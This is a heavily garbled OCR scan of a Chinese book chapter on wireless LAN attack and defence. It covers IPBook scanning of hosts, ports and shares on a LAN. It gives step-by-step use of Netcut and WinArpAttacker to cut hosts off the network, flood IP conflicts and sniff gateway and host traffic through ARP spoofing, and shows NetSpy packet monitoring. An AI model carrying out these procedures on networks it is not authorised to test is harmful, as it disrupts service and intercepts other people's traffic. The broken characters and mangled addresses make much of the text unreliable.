下 范围 192. 168.0 ”全 拉 并 一 个 网 段 | 筷 点 验 共 享 资源 | 从 大 示 到 炎 捕 | 到 短信 群发 
IF 地 址 |199, 168, 0, 104 | Firg | Hbtstat| :共享 | 加 必 短信 | 其 他 工具 = 
| 就 口 ”|80;21, 135 ”四 兵 由 %D | 四 大 范 国 品 口 扫 摘 | 


1921590104 。 DESKTOP6z?NQBIF WORKGRDUP 日 如 IgE. 156.0.U00 
1321680104 DESKTOPETHOBIF WORKGAOUP -图 公司 只 工 任用 汇 吕 
132168n1r6 DESKTOPSCYENGI WORKGROUP 司 公司 丘 邱 \ 

加 192168010? DESKTOPDSKFI5E WwORKGROUP 中 TS 公司 吕 工作 夺 江 已 

恩 192168.0108 网络 科技 wwDRPKGROUP 自 at 

叶 132.169.0 112 AFOIG-611211054 WwORKGAOUP 日 | 192 0 0 106 
192.169.0114 FOIG-?02111221 WORKERAOUP jm | 处 司 喇 工 任 必 汇 总 
192.168.0108 -- 国 公司 打 E 呈 1 

午 13:185010 时 白蚁 132 156 0.104 
192.168, . 

- 自 苹 一 号 


MS: DESKTOPS7NBBIF.DHCP HOST 


和 


\192.168.0.104\ 字 体 原 已 拭 打 开 。 


单 击 “ 探 测 端 口 ” 按 钮 ， 即 可 探测 整 
个 无 线 局 域 网 中 各 个 主机 的 端口 ， 同 时 将 
探测 的 结果 显示 在 下 面 的 列表 中 ， 如 下 图 
所 示 。 


才 IPBook 正式 注册 村 (起 梁 网 洛 令 居 ) = 问 Ww 
文件 WW) 工具 者 动 [ 轧 
扫描 。 | 数据 话 | 语 基 管理 骂 | 

1 范围 [192. 168.0 扫描 一 个 网 段 | 总 点 验 共享 资 源 


太 范 直 搜 捕 | 到 输 信 群发 
IP 地 址 [0 -| Pinz Jibtstat | xs 共享 | 到 点 和 运 信 


其 他 I 县 ~ 


| 端口 [80:21;135” 国 探测 端口 | 加 大 范围 澡 吕 扫描 | 

计算 机 区 

国 '% 1630104 DESKTOPETNOBIF WOAKGADUP -= 入 192. ] 的 .0.106 

国 132.1630104 DESFTOPETNOBIF WOAKGROUP :~ 入 公 司 员 工 任务 汇总 
150.1630106 DESKTOPECVBNGI WOAKGROUP 一 国 公司 打 Ep 机 

i DESKTOPDSKFISE wiAKGANUP 7 罚 er 

导 192.1 旧 0108 ”网 络 科技 WOAKGAROUP 个 A 

届 1321620112 AFOIG-511211054 WoOAKGROUP 驴 a 1 

eo AFOIG-702111221 WDAKGROUP 和 公司 员工 任 基 汇总 
1921690108 -全 公 司 打 ED 机 

加 132.160108 已 加 192. 155.0. 104 

| .全 字体 奈 

学 132.1630108 网 络 科技 wDRKGRDUP v -让 Kttp://I92.153.0.1M wv 

< 汪 > 


td 
192168.0.10 属 4135 类 口 开 闸 
1921E8.010 身 42 人 | 


\\192.,168.0.104\ 字 体 原 已 经 打开 .。 


单 击 “ 大 范围 端口 扫描 ”按钮 ， 
即 可 打开 “扫描 端口 ”对 话 框 ， 如 下 
图 所 示 。 选 择 “IP 地 址 起 止 范围 ” 单 选 
框 后 ， 将 要 扫描 的 IP 地 址 范围 设置 为 


寸 必 机 区 空 实 有 区 
i Le 最 后 将 
| rr ET 192.168.000.001~192.168.000.2534， 了 到 
1921680104 CDESKTOP-67HOBIF ”WORKGROUP Fe rp 汇总 
1 吧 1630.106 DESKTOP.SCVBNGI ‘WOARKGROUP | 2 四 “7 
1521630107 CESKETOP.DRAIE DRKGROUP 站 0 驳 !e 168. 0. 108 要 4 描 的 疯 置 为 = 
网络 科 搞 amc SAEsTa 三 | 口 公 80:21 o 
上 FDIG.-611211064 DRKGROUP i 
AFOIG-702111221 woOARKGROUP ; 、 一 一 
; 向 公司 员工 任务 汇总 扫描 党 口 
;一半 类 司 打 印 机 x 
~ || 提 ,站 163. 0. 104 
[字体 库 | 
2 扫 捅 范围 
pr i ‘Hest 和 科技。 Shahlams=p 光 科技 Meszengel= S 附近 的 几 个 C 网 段 
IFTRE 当 口 三 开 CT 
132.168.01 FT 不振 由 从 淖 节 扯 起 止 范 儿 
132.158.0104 的 21IF | 机 


TPR 册 口 不 开 负 
J] 开 夫 这 交 忻 安 ty 9 1E80104' 字 仁 匡 


只 后  ” ”各 
IPBook 工 具 还 具有 将 域名 转换 为 IP a fr 


地 址 的 功能 ， 在 “IPBook (超级 网 络 领 
居 ) ” 主 窗口 中 单 击 “ 其 他 工具 ”按钮 ， : 
在 弹出 的 快捷 菜单 中 选择 “域名 、IP 地 址 转 a 
换 ” 一 “IP 一 Name” 菜 单项 ， 即 可 将 IP 地 
址 转换 为 域名 ， 如 下 图 所 示 。 


NI192.168.0.104\ 社 体 库 已 经 打开 。 


扫 莉 计算 机 【192.168.0.*》 附近 从 
13215801 到 1321580254 共 1 个 网 丘 254 
台电 脑 的 满口 


E021 


取消 | Help | 
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单 击 “开始 ”按钮 ， 即 可 对 设 定 IP 地 
wwe 
的 主机 显示 在 下 面 的 列表 中 ， 如 下 图 所 示 。 


翅 IPBook 正式 注册 村 (起 汲 网 阁 邻 忆 ) Oo x 
文件 WW) 工兵 (WY) 项 动 [ 轧 
扫描 。 | 数据 床 | 说 产 管理 器 | 


EG 104 
By 5 
= 允 192. 
a - 国 公司 司 员工 任务 汇 名 
全 公 梧 打 Ep 机 
Http fr 16 0 


其 ttp : ) 
NttP ， 


亲口 扫 敬 任务 结束 。 


在 使 用 IPBook 工 具 过 程 中 ， 还 可 以 
对 该 软件 的 属性 进行 设置 。 在 “IPBook 


(超级 网 络 邻 居 ) ” 主 窗 口中 选择 “ 工 
具 ” 一 “选项 ”菜单 项 ， 即 可 打开 “ 设 
置 ” 对 话 框 ， 如 下 图 所 示 。 在 “扫描 设 
置 ” 选 项 卡 下 ， 即 可 进行 “Ping 设 置 ” 和 
“设置 解析 计算 机 名 的 方式 ”属性 。 


设置 xX 
: 扫 摘 设 癫 | # 享 设置 | 
Pingi& 秆 
TimeDut: [ p00 


厂 采用 上 先 Ping 后 : 


人 厂 扫描 时 顺带 搜索 共享 资源 


个 正 常 


(enbtstat 


| 确定 | 取消 | 才 助 | 


选择 “共享 设置 ”选项 卡 ， 在 其 中 可 
设置 最 大 线程 数 、 搜 索 共 享 时 的 顺带 搜索 
项 目 等 属性 ， 如 下 图 所 示 。 

王 


[254 


最 大 线程 数 


下 列 是 搜索 共享 时 的 顺带 搜索 项 目 
厂 搜索 HTTP 服 务 
| 搜索 FTP 服 务 
厂 搜索 隐藏 共享 


[| 取消 | 和 | 


第 14 章 ”无线 局 域 网 的 安全 防护 下 


如 果 成 功 注册 后 ， 就 可 以 使 用 大 范围 
搜索 功能 来 搜索 任意 范围 的 计算 机 名 、 工 
作 组 、MAC 地 址 及 共享 资源 等 。 


14.3 ”无 线 局 域 网 的 攻击 。 ” 冉 乌 


[ 

黑客 可 以 利用 专门 的 工具 来 攻击 整个 
无 线 局 域 网 ， 例 如 使 无 线 局 域 网 中 两 台 计 
算 机 的 IP 地 址 发 生 冲突 ， 从 而 导致 其 中 的 一 
台 计算 机 无 法 上 网 。 本 节 将 介绍 几 款 常见 


的 局 域 网 攻击 工具 的 使 用 方法 。 
14.3.1 ”网络 剪 刀 手 Netcut 


网 络 前 切 手 Netcut 是 一 款 网 管 必 备 工 
具 ， 可 以 使 无 线 局 域 网 中 任何 主机 断 开 网 络 
连接 。 利 用 ARP 协 议 ， 同 时 也 可 以 看 到 无 线 
局 域 网 内 所 有 主机 的 IP 地 址 。 还 可 以 控制 本 
网 段 内 任意 主机 对 外 网 的 访问 ， 随 意 开局 或 
关闭 其 Internet 访 问 权 限 ， 而 访问 内 部 LAN 
其 他 机 器 不 存在 任何 问题 。 

该 工具 的 具体 使 用 步骤 如 下 : 
下 载 并 安装 网 络 剪 刀 手 Netcut， 然 后 
双击 其 快捷 图 标 ， 即 可 打开 Netcut 主 窗口 。 
软件 会 自动 搜索 当前 网 段 内 的 所 有 主机 的 
IP 地 址 、 计 算 机 名 以 及 各 自 对 应 的 MAC 地 
址 ， 如 下 图 所 示 。 


单 击 “ 选 择 网 卡 ” 按 钮 ， 打 开 “ 选 
择 网 卡 ” 对 话 框 ， 在 其 中 可 以 选择 搜索 计 
算 机 及 发 送 数 据 包 所 使 用 的 网 卡 ， 如 下 图 
所 示 。 
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一 黑客 攻防 与 无 线 妥 全 从 新 手 到 高 手 〈《 超 值 版 ) 


如 果 无 线 局 域 网 中 主机 太 多 ， 可 以 使 
ppp 查找 功能 ， 快 速 查看 某 个 主 
机 的 信息 。 在 Netcut 主 窗口 中 单 击 “查找 ” 按 
钮 ， 即 可 打开 “查找 ”对 话 框 ， 如 下 图 所 示 。 


网 
网 卡 : Attansic L2 Fast Ethernet Controller [Microsoft's Packet 
5chedulen 


和 在 其 中 的 文本 框 中 输入 要 查找 主机 的 
网 关 : [192.168.0.1] 某 个 信息 ， 这 里 输入 的 是 IP 地 址 ， 然 后 单 击 
“查找 ”按钮 ， 即 可 在 Netcut 主 窗口 中 快速 


找到 JP 地 址 为 192.168.0.8 的 主机 信息 ， 如 下 
step 图 在 网 络 剪 刀 手 中 还 可 以 开启 或 关闭 无 图 所 示 。 


yp yi 主机 对 网 关 的 访问 。 在 扫 
描 出 的 主机 列表 中 选中 了 了 地 址 为 192.168.0.8 
的 主机 后 ， 单 击 “ 切 断 ” 按 钮 ， 即 可 看 到 
该 主机 的 “ 开 / 关 ”状态 已 经 变 为 “ 关 ”， 
此 时 该 主机 不 能 访问 网 关 ， 也 不 能 打开 网 
页 ， 如 下 图 所 示 。 


昌 阳 阳 问 阳 阳 阳 委 站 站 上 
1 忆 半 4 下 由 沁 于 


ce 路 ,， [oo:lE'SC,1750;95] 


[step 国 利用 网 络 剪 刀 手 的 打印 表 功 能 即 可 查 
PP 中 所 有 主机 的 信息 。 在 Netcut 
主 窗口 中 单 击 “ 打 印 表 ”按钮 ， 即 可 打开 
“地 址 表 ” 对 话 框 ， 在 其 中 即 可 看 到 所 在 
无 线 局 域 网 中 所 有 主机 的 MAC 地 址 、IP 地 
址 、 用 户 名 等 信息 ， 如 下 图 所 示 。 


策 未 老 


蝎 阳 阳 间 了 妆 阳 阳 委 阳 间 | 
让 - - 1 油 沿 习 本 


再 次 选中 IP 地 址 为 192.168.0.8 的 主机 
后 ， 单 击 “ 恢 复 ” 按 钮 ， 即 可 看 到 该 主机 
的 “ 开 / 关 ”状态 又 重新 变 为 “ 开 ”， 此 时 
该 主机 可 以 访问 Internet 网 络 ， 如 下 图 所 示 。 


gi 全 卫 辑 省 交 和 


1 hn es 5 
mrorof-7aE8ds.... [OG:1E:SC:17:E0:85] 


旧 妇 有 阳 旧 胆 有 阳 阳 胆 胆 阳 间 旧 因 中 中 
1 科 壮 | 站 1 沁 求 国 忆 四 
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在 网 络 剪刀 手工 具 中 还 可 以 将 某 个 主 
机 的 IP 地 址 设置 成 网 关 IP 地 址 。 在 Netcut 主 
窗口 中 选择 某 台 主机 后 ， 单 击 硬 亲近 包 ， 

将 该 IP 地 址 添加 到 “网 关 IP” 列 表 中 ， 如 下 
图 所 示 。 


Ee 品 rT 


mcrosof-7aterch,,,, [C0;1E;C:17:;B0;:E5] | 110.15 
ee ee Wei 


间 提 加 间 阅 间 昌 问 问 上 


14.3.2 WinArpAttacker 


WinArpAttacker 是 一 球 功 能 强大 的 无 线 
局 域 网 软件 ， 利 用 该 工具 可 以 实现 对 ARP 机 
器 列表 扫描 ; 对 ARP 攻 击 、 主 机 状态 、 本 地 
ARP 表 发 生变 化 等 进行 检测 ; 检测 其 他 机 
器 的 ARP 监 听 攻 击 ， 并 目 动 恢复 正确 的 ARP 
表 ; 把 ARP 数 据 包 保存 到 文件 ;发送 手 工 定 
制 ARP 包 等 。 但 是 该 工具 是 基于 Winpcap 软 
件 , 所 以 在 运行 前 必须 先 安装 Winpcap 软 件 。 

使 用 WinArpAttacker 工 具 的 具体 操作 步 
又 如 下 : 

下 载 WinArpAttacker 软 件 ， 双 击 其 中 
的 “WinArpAttackerexe” 程 序 ， 即 可 打开 
“WinArpAttacker” 主 窗口 ， 如 下 图 所 示 。 


BB Untitled - WinArpAttacker 3.70 和 口 x 


文件 接 挡 攻击 性 测 识 呈 罕 口 邦和 
止 EE 更 


见 民 黑 吕 - 光 - 
| Online | Sniffng | Attack 


IP Address | Mac Address Hostname 
口 192.168.0.104 D0-1E-3C-AD-13-..。 DESKTOP-67NQ.，Online Normal Normal 0 0 


芷 
by 


> 
Time Event ActHost EffectHost Ip Mac ~ 
| 2017-08-14 17:50:44 New Host 192,.158.0.1 F4-83-CD-33 169.254.255.255 00-00-00-00-1 
192.168.0.1 Fd-83-CD-33- 
192.168.0.2 00-00-00-00-! 
192.158.0.3 00-00-00-00-4Y 
< > 
[08/14/17 17:5021) ——WnAmAtocker 3 70 Buid 2006.09.04—— 
[O814/17 17:5021) Ths program is irecware, SO you con use ond rcdisiributc + irccjy 
Ready IP; 192.168.0.104 |Mac: 00-1E-8C-AD-13-'IGW: 19e 


第 14 章 ”无线 局 域 网 的 安全 防护 ”时 


step 回 选择 a ”一 > “高级” 菜单 项 ， 
即 可 打开 “扫描 ”对 话 框 ， 从 中 可 以 看 出 
有 “扫描 主机 ”“ 打 描 网 段 ”“ 多 网 段 打 
描 ” 等 3 种 扫描 方式 ， 如 下 图 所 示 。 

高 级 扫描 

G 扫 挡 证 机 |192 ,16 .0 | 

个 扫 摘 网 段 192 .168 .0 .1 |192 .168 .0 .254 

个 多 网 段 扫描 


口 0 192.168.0. 104 


255. 255. 255. 0 


lv 正常 扫描 三 尽 点 听 扫 损 


扫 描 | 取消 | 


step 图 使 用 “扫描 主机 ”方式 可 以 获得 目 
标 主机 的 MAC 地 址 。 在 “扫描 ”对 话 柱 
中 选择 “扫描 主机 ” 单 选 按钮 ， 并 在 后 面 
的 文本 框 中 输入 目标 主机 的 IP 地 址 ， 例 如 
192.168.0.104， 然 后 单 击 “扫描 ”按钮 ， 即 
可 获得 该 主机 的 MAC 地 址 ， 如 下 图 所 示 。 
人 

高 级 扫描 

ce 扫描 主机 

人 扫描 网 段 

个 多 网 段 扫描 


| 192 .168 .0 .104 bo-1E-8C-AD-13-5F 


Ul .264 


三 尽 上 监听 扫描 


[Y 正常 扫描 


扫 指 | 取 消 | 


“扫描 网 段 ” 方 式 可 以 对 指定 I 段 范 
围 内 的 主机 进行 扫描 。 和 选择“ 扫描 网 段 ” 
单 选 按钮 后 ， 在 IP 地 址 范围 的 文本 框 中 输入 
扫描 的 卫 地 址 范围 ， 如 下 图 所 示 。 
高 级 扫描 ES 
sk. 52 CE 交 和 ee 惠 


人 扫 拉 网 段 | 192 168 .0 .1 


个 多 网 段 扫 措 


DO-1E-8C-—AD-13-5F 


192 .168 . 0 .254 


口 0 192.168.0. 104 


255. 255. 255. 0 


lv 正常 扫描 三 尽 点 听 扫 措 


扫 指 


取 消 | 
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单 击 “扫描 ”按钮 即 可 进行 打 描 
操作 ， 当 扫描 完成 时 会 出 现 一 个 Scaning 
successfully! 对 话 框 ， 如 下 图 所 示 。 


WinArpAttacker xX 


\ Scanning successfully ! 


依次 单 击 “确定 ”按钮 ， 返 回 到 
WinArpAttacker 主 窗口 中 ， 在 其 中 即 可 看 到 
扫描 结果 。 此 时 WinArpAttacker 窗 口 被 分 成 
三 个 部 分 ， 如 下 图 所 示 。 


WB Untitled - WinArpAttacker 3,70 一 口 X 
文件 所 撕 攻击 检测 设 豆 窒 口 完 助 
-0 
I 
开 接 尖 设 下 更新 
IP Addres [MacAddress |Hostname | Online | sniffng | Attack | arpsQ| Arpsp | ArpR... | arprp | 
口 192.168.0,1 H4-83-CD-33-60-,. ene 168.0.1 Online Normal Normal 7 0 1 
口 19z2168.0.100 Ad-5E-60-16-7A-... 92.168.0.100 Online Normal Normal D 0 1 0 
口 192168.0.104 00-1E-8C-AD-13-,,, ed Online Normal Normal 258 11 13 
口 192168.0.105 00-23-24-D9-B6-... DESXTOP-SCVE... Online Normal Normal 1 0 0 1 
口 132168.0.107 S58-F8-84-FB-58-.. DESKTDP-D5KF.， Online Normal Normal 1 0 0 1 
口 192168.0.108 40-A5-EF-DE-A9-.. 192.168.0.108 Online Normal Normal 3 0 0 3 
口 192168.0.112 C8-60-00-9C-CC-..。AFOIG-6112110.， Online Normal Normal 1 0 0 1 
Time Event ActiHiost EffectHost A | IP Mac 
2017-08-14 17:53:09 New Host 192.168.0.106 40-A5-EF-DE-A9-,,, 192,168.0,1 F4-83-CD-33-60-,,, 
2017-06-14 17:53:10 Arp_Stan 192.163.0,104 192.168.0.2 00-00-00-00-00 
2017-08-14 17;53;08 New Host 192,168.0,112 C8-60-00-9C-CC-,., 192,168.0.3 00-00-00-00-00- 
2017-06-14 17:53:08 New Host 192.163.0,.106 00-23-24-D39-66-... 192.168.0.4 00-00-00-00-00-... 
Y |1o214Fans MMM_M Mm. 4 


< 
i ash lepineoge sohbet 
17:50:21] Thla program 8 fraewars, 80 you can ves send redisirbuts ¢ fraely 


Ready IP: 192.168.0.104 Mac: 00-1E-8C-AD-13-' GW: 192.168.0.1 GW 


e 上 面 的 区 域 是 主机 列表 区 ， 主 要 显 
示 无 线 局 域 网 内 的 机 器 IP、MAC、 
主机 名 、 是 否 在 线 、 是 否 在 监听 、 
是 否 处 于 被 攻击 状态 ， 以 及 ARP 数 
据 包 和 转发 数据 包 统 计 信 息 等 ; 

e 左下 方 的 第 二 个 区 域 是 检测 事件 显 
示 区 ， 主 要 显示 检测 到 的 主机 状态 
变化 和 攻击 事件 ; 

e 右 下 方 的 区 域 显示 IP 地 址 和 MAC 地 
址 信息 。 

在 扫描 结果 中 选中 要 攻击 的 目标 计算 
re tp 
口中 单 击 “ 攻 击 ” 下 拉 按 钮 ， 在 弹出 的 快 
捷 菜 单 中 选择 任意 选项 就 可 以 对 其 他 计算 
机 进行 攻击 了 ， 如 下 图 所 示 。 
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BB Untitled - WinArpAttacker 3.70 一 口 XxX 
立 忻 扫描 攻击 栓 则 识 吾 译 口 姑 助 


限 HP 二 二 - 

型 局 时 次?- 拒 |- 纹 效 儿 区 癌 嫩 守 锡 
| 开 评 : 溢 前 订 这 各 更 类 关 可 
IP Addre | Mac Address | Sniffing |Arock |Arpsa Arpsp | ArpR... | ArpRP | 1 
ee F4-83-CD-33-6 莘 止 上 网 hline Normal ”Normal 46 0 0 5 
口 192.168.0.100 A4-5E-60-16-7 定 盾 IP 站 实 hine Normal Normal 0 0 6 0 
口 192163.0.104 00-1E-8C-AD-1 hline Normal Normal 258 15 17 7 
口 192.168.0.106 ”00-23-24-D9-8 监听 网 关 到 污 hine Normal Normal 1 0 3 1 
口 192.168.0.107 58-F8-84-Fe-5 监听 主机 通 汉 hline Normal Normal 1 0 0 1 
回 192.163.0.108 40-A5-EF-DE-A 0 网络 带 汉 hline Normal Normal i 0 2 3 
口 192.168.0.112 ”C8-60-00-9C-C- 一 -~ Nine Normal Normal 1 0 1 1 

me | Event ActHost EffectHost A | Ip Mac 
2017-08-14 17:53:09 ”New _ Host 192.168.0.108 40-A5-EF-DE-A9-.. 192.168.0.1 F4-83-CD-33-60- 
2017-08-14 17:53:10 ”Arp Scan 192,168.0.104 192,168,0,2 00-00-00-00-00-,， 
2017-08-14 17:53:08 New Host 192.168.0.112 C3-60-00-9C-CC-... 192.168.0.3 00-00-00-00-00: 


2017-08-14 17:53:08 New Host 192.168.0.106 100-23-24-D9-86-.,， 192.168.0.4 
Y loa 1kans 


nnnnn-nnm-nmm- 


[UST TU 一 WATPRAISEEIT 3 FU DURY ZUUG UU 4—— 
[IDEA1T 17:50:21] This program & treeware 30 YOU Can use and redistrbute E freely 


在 WinArpAttacker 中 有 以 下 6 种 攻击 
方式 : 
e 不 断 IP 冲 突 : 不 间断 的 IP 冲 突 攻 
击 ，FLOOD 攻 击 默认 是 一 干 次 ， 可 
以 在 选项 中 改变 这 个 数值 。FLOOD 
攻击 可 使 对 方 机 器 弹出 IP 冲 突 对 话 
框 ， 导 致死 机 ，; 
e 禁止 上 网 : 禁止 上 网 ， 可 使 对 方 机 
器 不 能 上 网 ; 
定时 IP 神 突 : 定时 的 卫 神 突 ; 
监听 网 关 通 信 : 监听 选 定 机 器 与 网 
关 的 通信 ， 监 听 对 方 机 器 的 上 网 流 
量 。 发 动 攻 击 后 用 抓 包 软件 来 抓 包 
看 内 容 ; 
@ 监听 主机 通信 |: 
器 之 间 的 通信 ; 
e 监听 网 络 通信 : 监听 整个 网 络 任意 
机 器 之 间 的 通信 ， 这 个 功能 过 于 危 
险 ， 可 能 会 把 整个 网 络 搞 乱 ， 建 议 
不 要 乱用 。 
如 果 选 择 “IP 冲 突 ” 选 项 ， 即 可 使 目 
ibe ee 
系统 有 冲突 ”提示 框 ， 如 下 图 所 示 。 


监听 选 定 的 几 台 机 


外 Tindors - 厅 统 铺 误 


IF 地 址 与 网 络 上 的 其 地 系统 有 圳 突 。 


[step 图 如 果 选 择 “ 禁 止 上 网 ”选项 ， 此 时 在 
WinArpAttacker 主 窗口 就 可 以 看 到 该 主机 的 
“攻击 ”属性 就 变 为 BanGateway， 如 果 想 


停止 攻击 ， 则 需 在 WinArpAttacker 主 窗口 选 
择 “ 攻 击 ” 一 “停止 攻击 ”菜单 项 进行 停 
止 ， 否 则 将 会 一 直 进 行 ， 如 下 图 所 示 。 


BW Untitled - WinArpAttacker 3,70 一 口 x 
文 忻 扫把 攻 主 裕 出 设 加 番 口 及 即 


| 风 羽 居 | 


ip Address 


D192,168,0,1 F4-83-CD-33-60-,.. 192,168,0,1 Online Normal 
口 192168.0.100 A4-5E-60-16-7A-.. 192.168.0.100 Online Normal Normal 6 0 8 0 
口 192168.0.104 00-1E-8C-AD-13-... DESKXTOP-67NQ... Online Normal Normal 264 23 24 10 


口 192168.0.106 
口 192.168.0.107 


00-23-24-D9-B6-.。 DESKTDpP-5CVB..， Online Normal Normal 了 0 了 1 
59-FB-a4-FB-58-.、 DESXTOP-DSKF.. Online Normal Normal 7 0 1 1 
on AC FE NCEA pr 下 py ye 


92.1068.0.106 $40-A3-EF-DE-A9-,.. 192.168.0.108 Onlne Norma anGatewal 0 3004 0 3005 
口 192168.0.112 C8-60-00-9C-CC-... AFOIG-6112110.. Online Normal rmal 7 0 2 1 


攻 > 


Time | Event ActHost | EffectHost [| ^ |[P Mac ~ 
2017-08-14 17:55:;34 Attack IP Conilict 192.168.0.108 40-AS5-EF-DE-AY-,,. 192.168.0.1 F4-83-CD-33-60- 
2017-08-14 17:55:15 Local Arp Entry Change 192.1630.108 40-AS5-EF-DE-Ag-... 192.158.0.2 00-00-00-00-00 
2017-08-14 17:56:06 Attack Spoof Ban Access 0.000 192.168.0.1 192.1680.3 00-00-00-00-00 
a017-08-14 17:56:06 Attack SPocf Ba nAccess 0.000 192.168.0.108 192.168.0.4 00-00-00-00-00 

Y |107 Fans mmmmnm. ™ 
< > < 
[DB1417 17:55:33 Fodng mssion finished. 六 
[O814/17 17 56:06j 5anGaloway mesion sterted 8UCC688fWuly 
Ready lIp: 192.168.0.104 |Mac: 00-1E-8C-AD-13-'IGW: 19216801 IGW L/ 


在 WinArpAttacker 主 窗口 中 单 击 “发 
送 ” 按 钮 ， 即 可 打开 “手动 发 送 ARP 包 ” 
对 话 框 ， 在 其 中 设置 目标 硬件 Mac、Arp 方 
向 、 源 硬件 Mac、 目 标 协议 Mac、 源 协议 
Mac、 目 标 IP 和 源 IP 等 属性 后 ， 单 击 “ 发 
送 ”按钮 ， 即 可 向 指定 的 主机 发 送 ARP 数 
据 包 ， 如 下 图 所 示 。 

手动 &ARF 包 xX 


配置 IF 冲 突 包 


Dst Hardware 项 ac 


00-00-00-00-00- 


三 Mrp op [Request ”| 三 


[00-00-00-00-00-( 厂 
00-00-00-00-00-( 三 
00-00-00-00-00-( 厂 


Sro Hardware MMac 
Dst Protocol 大 ac .0 .0 加 


0 .0 玉 


Dst IF 0 .0 


Sre Protocool ac Sre IP 0 .0 


00000000 00 00 00 00 00 00 00 00 00 00 00 00 08 06 00 01 
00000010 08 00 06 04 00 01 00 00 00 00 00 00 00 00 00 00 
00000020 00 00 00 00 00 00 00 00 00 00 


这 是 给 高 级 用 的 ， 要 对 ARP 包 的 结构 比较 熟悉 才 行 。 如 果 你 知道 ARP 攻 击 原理 ， 你 可 以 
部 习 用 作 信 内科 ;本 和 1 5 


Frequency configure Delay between packets 


Delay p ns 
太 Disable Detect feature. 


取 消 | 


在 WinArpAttacker 主 窗口 中 选择 

“设置 ”菜单 项 ， 然 后 在 弹出 的 快捷 菜 
单 中 选择 任意 一 项 即 可 打开 Options 对 话 
框 ， 在 其 中 对 各 个 选项 卡 进行 设置 ， 如 下 
图 所 示 。 


全 Continuously 


fe omber of time |1 一 | 


第 14 章 ”无线 局 域 了 网 的 安全 防护 EAI 全 


Options X 
适配器 | 攻 主 | 更 新 | 检测 | 分 析 |ARP 代 理 | 保护 | 


Atheros L1 Gigabrt Ethernet 


拱 述 [Atheros L1 Gigabit Ethernet 10/100/100( 


本 机 IP e21680104 -+| 
子 网 羯 三 [2552552550 | 
本 机 MAC [00-1E-8C-AD-13-5F 

网 关 IP hsz16801 +| 
网 关 MAC [F483-cD-33-60-73 +| 


DNS 6 .128.114.134 
6 .128.114.167 
列表 |\Device\NPF {82CAC205-4844-4802-8E93-EC6F26B0D70R) 


-| 


| we | ww | 


14.3.3 网络 特工 


网 络 特工 可 以 监视 与 主机 相连 Hub 上 所 
有 机 器 收发 的 数据 包 ; 还 可 以 监视 所 有 无 
线 局 域 网 内 的 机 器 上 网 情况 ， 以 对 非法 用 
户 进行 管理 ， 并 使 其 登录 指定 的 JP 网址 。 

使 用 网 络 特工 的 具体 操作 步骤 如 下 : 
下 载 并 运行 其 中 的 “网 络 特工 .exe” 
程序 ， 即 可 打开 “网 络 特工 ” 主 窗口 ， 如 下 
图 所 示 。 


居 Kennear - 网 党 以 工 — 口 xX 
文件 (月 ” 杏 大 (V) 工 呈 站) 帮助 IH) 
z) [1 
下 un 村 
DD htheros Ll Gipgabit 由 ee 
Eath | COLEECADII35R 
-- 情 癌 管理 (右键 点 i | 匡 地 址 1.13.0104 
玫 件 性 币 问 岳 码 。 255.355.255.0 
-互联 里 立 网 未 了 192. 183.0.1 
广告 垃 招租 : 0 .35 元 /平方 蛋 秋 年 
< 》 < > 
Ww | WFi : 


选择 “工具 ”一 “选项 ”菜单 项 ， 
即 可 打开 “选项 ”对 话 框 ， 在 其 中 可 以 设 
置 “ 启 动 ”“ 全 局 热 键 ”等 属性 ， 如 下 图 
所 示 。 
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选项 XxX 
启动 了 上 杂 硕 
厂 操作 系统 启动 时 自动 运行 程序 ， | 退出 程序 时 需要 密码 验证 
程序 启动 H 旺 示 系统 托盘 图 标 ， | 把 不 显示 广告 (需要 重新 运行 程序 ) 
瑟 程序 启动 时 显示 主 窗口 厂 启动 时 不 显示 程序 WGo 


-全 局 热 键 
显示 ,隐藏 主 窗口 执 键 : jctrl + Shift + Mt + 


厂 热 键 显 示 主 窗口 时 需要 密码 验证 


-报警 声音 设置 
浏览 D:\360 安 全 浏 贞 嫩 下 载 \ 黑 容 工 具 Vnet_spy\NetSpyVwa 


cael | 


step 图 在 “网 络 特工 ” 主 窗 口 左边 的 列表 
ee “数据 监视 ”选项 ， 即 可 打开 “ 数 
据 监视 ”窗口 。 在 其 中 设置 要 监视 的 内 容 
后 ， 单 击 “ 开 始 监视 ”按钮 ， 即 可 进行 监 
视 ， 如 下 图 所 示 。 


和 Kennear - 网 治 慰 工 一 口 x 
文件 (月 ”吉大 (V) 工 ET 吕 助 (H) 


~ 让 I 信人 

口 下 017-09-]4 17:2z:14.12T ED B F483CIS360T3-)0017ECAD]5I 以 太 | arp 辐 应 LS2. 163. 0. 1-»] 
DD htheros UL Gigabit 2017-08- 14 17: 22 14 335 号 001BECADLEP-)R40CIONDN 以 太 IFuvd tep i152. 1 0 104- 

2017-08- 1 I :到 4.3 坟 ”大 BB 00186CNDL3P->R003CIS3807] 书 IEvd top L192. 163. 0. 1 
a 2017-08 2Z.14.40 6 B Rd63CIS36073-)001B6CJDI351 以 IFvd top L860. 183. 255. 16 
2 2 .4 6 B00ICTSS6073-)00136CMD1%1 以 太 问 IEvd tep Le0. 163. 255. LG 
7:22:15.423 S75 B 56p654775310->01005Z le. 163 0 107— 
Tb 计 22:15 710 S75 B 56g884735310->01005Z7TFFF Ll IFv4 np L$2. 163. 0 107— 
2017-08-]* 17:22°15 Tr2 60 B P363CISS60T3-?001ZECADJ35T KL IFv4 tcp 106. 33. 219 25- 
017-08-14 17:22:15. TT2 54 8B 001BECAMDL3SSF-)B483CTE350T] 以 太 IEv4 tcp 1S2. 163. 0. 104- 
2017-06-14 17:22:15.55] E27 B 59pBB43735310-)0100cZITFFFL 以 太 | IEv4 ugp lS2. 163. 0. 107- 
2017-06-14 17:22:16.043 Pe? B 56BB6475310-)01005F7TFFPE 以 六 IPud utp L122. 163. 0. 107— 
2017-00-14 17:2z:16.230 eco B 56 0-)01005EZ7ZFFF Ll! IEvd uip L$2. 163. 0. 107 
ii4 17.22.16. WH Gm Bb 56p584735310-)0i005EFTFFF Ll! IEvd i .107 
2017-08-1t 17:22:16.574 Ee4 568664735510-701005Z (| IFv4 vip L$2. 163. 0. 107— 
2017-08-14 17:22.16.652 EES4 B 56B8547T5310-201005Z7TFFF 以 TFv4 1 纶 . 163. 0 107- 
2017-08-14 17:22.16 .793 E65B 00165CMDL3SSF-gd63CTS300T] 以 IFv4 tep L$2. 163.0 ee 

< 

I NW 和 找 操 此 和 杭 了 笃 让 晤 往 

六 IEktHH D 0 0 0 三 洲 口 计 垃 0 区 梁 动 民 芋 暂停 

持 所 各 过 术 字 行 向 < 请 去 正确 > 

